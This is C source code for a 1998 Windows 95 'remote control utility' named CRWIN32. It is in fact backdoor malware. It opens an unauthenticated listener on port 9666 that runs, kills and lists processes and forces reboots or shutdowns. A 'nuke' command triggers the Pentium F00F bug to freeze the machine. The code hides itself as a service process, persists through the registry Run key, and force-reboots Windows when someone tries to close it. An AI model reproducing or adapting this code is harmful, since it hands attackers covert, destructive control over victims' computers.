/*
 * CRWIN32 Windows 95 Remote control utility.
 *
 * Copyright (C) 1998  ztank
 *
 * See CRWIN32.TXT for instructions.
 */
#include "sock.h"
#include "proc.h"
#include "bo.h"
#include <stdio.h>
#include <stdlib.h>
#include <winbase.h>
#include <time.h>
#include <tlhelp32.h>

#define CRWIN_PORT	9666
#define WELCOME_MSG	"CRWIN32 1.5 Active\r\n"
#define PROG_NAME	"CRWIN32.EXE"

/*
 * Print a message to the log file
 */
void logmsg(char *msg)
{
	FILE *fp = NULL;
	char wdir[MAX_PATH];
	char fname[MAX_PATH+12];
	
	/* get the windows directory */
	if (!GetWindowsDirectory(wdir, MAX_PATH))
		strcpy(wdir, "c:");
	
	/* create the log file name, assuming windows is not in root 
	 * directory */
	strcpy(fname, wdir);
	strcat(fname, "\\crwin32.dat");
	
	/* open error log file */
	fp = fopen(fname, "a+");

	/* print error message */
	if (fp != NULL)
	{
		fprintf(fp, msg);
		fclose(fp);
	}
}

/* activate the pentium bug and freeze the computer */
void PentiumBug(void)
{
	/* pentium bug (F00FC7C8) - fill in with hexeditor */
	__asm
	{
		xor eax, eax	/* 33C0 --> F00F */
		xor eax, eax	/* 33C0 --> C7C8 */
	}
}


/*
 * If the user tries to kill the process without using TerminateProcess, 
 * it will be intercepted here and dealt with by shutting down windows.
 */
LRESULT CALLBACK MainWndProc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
	switch (msg) {

	case WM_CREATE:
		return 0;

	case WM_DESTROY:
		/* this	is a far from graceful exit! */
		if (!ExitWindowsEx(EWX_FORCE | EWX_REBOOT, 0))
		{
			PentiumBug();
		}
		break;

	default:
		return DefWindowProc(hWnd, msg, wParam, lParam);
	}

	return 0;
}

/*
 * Print error message msg and terminate the program 
 * If possible write to a log file.
 */
void error(char *msg)
{
	logmsg(msg);
	exit(1);
}

/*
 * Callback routine, called by processData().
 */
int processInput(int fd, char *buf, int n)
{
	/* some applications (windows TELNET.EXE) don't send a line at a time
	 * but rather character at a time. Kill them.
	 */
	if (buf[n-1] != '\n') {
		sendmesg(fd, "\r\nBugger off!\r\n");
		return 1;
	}

	/* strip off the "\r\n" */
	buf[n-2] = '\0';

	if (strncmp(buf, "exec", 4) == 0)	/* create a new process */
	{
		SpawnProcess(fd, &buf[4]);
	}
	else if (strcmp(buf, "harakiri") == 0)	/* kill CRWIN32 */
	{
		socketShutdown();
		exit(0);
	}
	else if (strncmp(buf, "kill", 4) == 0)	/* kill a process */
	{
		KillProcess(fd, &buf[4]);
	}
	else if (strcmp(buf, "nuke") == 0)	/* activate the bug */
	{
		PentiumBug();
		sendmesg(fd, "PBUG is not present\r\n");
	}
	else if (strcmp(buf, "ps") == 0)
	{
		ProcessList(fd);
	}
	else if (strcmp(buf, "quit") == 0)	/* disconnect */
	{
		sendmesg(fd, "Bye!\r\n");
		return 1;	/* close socket */
	}
	else if (strcmp(buf, "reboot") == 0)	/* shutdown and reboot */
	{
		if (!ExitWindowsEx(EWX_FORCE | EWX_REBOOT, 0))
		{
			sendmesg(fd, "Failed to shutdown!\r\n");
		}
		return 1;
	}
	else if (strcmp(buf, "shutdown") == 0)	/* shutdown and turn off computer */
	{
		if (!ExitWindowsEx(EWX_FORCE | EWX_POWEROFF | EWX_SHUTDOWN, 0))
		{
			sendmesg(fd, "Failed to shutdown!\r\n");
		}
		return 1;
	}
	else
	{
		sendmesg(fd, "Unknown command\r\n");
	}

	sendmesg(fd, "> ");

	return 0;
}

/*
 * Set up the registry so that CRWIN32 always loads at startup.
 * If installing is true the registry is set up.
 * If installing is false the CRWIN32 data is removed from the registry.
 */
void regSetup(bool installing)
{
	HKEY hk;

	RegOpenKeyEx(HKEY_LOCAL_MACHINE, 
		"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
		0,
		KEY_ALL_ACCESS,
		&hk);

	if (installing)
	{
		RegSetValueEx(hk,
			"CRWIN32",
			0L,
			REG_SZ,
			PROG_NAME,
			strlen(PROG_NAME) + 1);
	}
	else
	{
		RegDeleteValue(hk, "CRWIN32");
	}

	RegCloseKey(hk);
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, 
				   LPSTR lpCmdLine, int nCmdShow)
{
	int serversock;
	SocketList slist;
	FARPROC RegisterServiceProcess = NULL;

	MSG msg;
	HWND hWnd;
	WNDCLASS wc;

	/* this is needed for windows, it allows the WM_DESTROY message
	 * to be intercepted.
	 */
	if (!hPrevInstance)
	{
		wc.lpszClassName = "GenericAppClass";
		wc.lpfnWndProc = MainWndProc;	/* handler function */
		wc.style = CS_OWNDC | CS_VREDRAW | CS_HREDRAW;
		wc.hInstance = hInstance;
		wc.hIcon = LoadIcon( NULL, IDI_APPLICATION );
		wc.hCursor = LoadCursor( NULL, IDC_ARROW );
		wc.hbrBackground = (HBRUSH)( COLOR_WINDOW+1 );
		wc.lpszMenuName = "GenericAppMenu";
		wc.cbClsExtra = 0;
		wc.cbWndExtra = 0;

		RegisterClass( &wc );
	}

	hWnd = CreateWindow( "GenericAppClass",
		"CRWiN32",
		WS_OVERLAPPEDWINDOW|WS_HSCROLL|WS_VSCROLL,
		0,
		0,
		CW_USEDEFAULT,
		CW_USEDEFAULT,
		NULL,
		NULL,
		hInstance,
		NULL
	);

	//ShowWindow(hWnd, SW_HIDE);

	/* Register as a service process */
	RegisterServiceProcess = GetProcAddress(
		GetModuleHandle("KERNEL32.DLL"), "RegisterServiceProcess");
	if (RegisterServiceProcess)
		RegisterServiceProcess(GetCurrentProcessId(), 1);

	RemoveBackOrifice();

	if (strcmp(lpCmdLine, "/setup") == 0)
	{
		regSetup(true);
		return 0;
	}
	else if (strcmp(lpCmdLine, "/remove") == 0)
	{
		regSetup(false);
		return 0;
	}

	if (!socketInit())
		error("Error initialising socket library!\n");

	initSocketList(&slist);
	serversock = initServer(CRWIN_PORT);

	if (serversock == -1)
		error("Error initialising server!\n");

	while (true) {

		/* check for a windows message */
		if (PeekMessage(&msg, NULL, 0, 0, PM_REMOVE)) {
			TranslateMessage(&msg);
			DispatchMessage(&msg);
		}

		/* check if another connection is pending */
		if (checkServer(serversock))
		{
			int client_port;
			char ip_addr[40];

			int clientsock = acceptConnection(serversock, ip_addr, &client_port);

			if (clientsock != -1)
			{
				char line[120];
				char buf[80];
				struct tm *tm_ptr = NULL;
				time_t t;

				sendmesg(clientsock, WELCOME_MSG);
				sendmesg(clientsock, "> ");		/* prompt */

				/* log client */
				time(&t);
				tm_ptr = localtime(&t);
				strcpy(line, asctime(tm_ptr));	/* time */
				line[24] = '\0';				/* get rid of '\n' from asctime */
				strcat(line, " - ");
				strcat(line, ip_addr);
				sprintf(buf, " port %d\n", client_port);
				strcat(line, buf);
				logmsg(line);

				addSocket(&slist, clientsock);
			}
		}

		/* poll sockets and process any data read in */
		checkIO(&slist, 100);
		processData(&slist, processInput);
	}

	return msg.wParam;;
}
